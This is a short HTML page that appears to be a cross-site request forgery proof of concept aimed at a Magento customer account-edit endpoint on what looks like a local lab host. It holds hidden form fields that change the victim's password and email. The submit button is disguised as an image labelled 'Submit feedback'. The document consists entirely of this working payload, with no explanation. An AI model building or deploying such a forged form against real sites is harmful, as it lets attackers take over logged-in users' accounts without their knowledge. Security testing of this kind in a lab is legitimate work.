<body>
<form action="http://magento-edu.local/customer/account/editPost/" method="post">
<input name="password" value="test123" type="hidden"/>
<input name="confirmation" value="test123" type="hidden"/>
<input name="firstname" value="tester" type="hidden"/>
<input name="lastname" value="test" type="hidden"/>
<input name="email" value="jakismail@gmail.com" type="hidden"/>
<input name="change_password" value="1" type="hidden"/>
<input type=image src=images.jpg alt="Submit feedback">
</form>
</body>

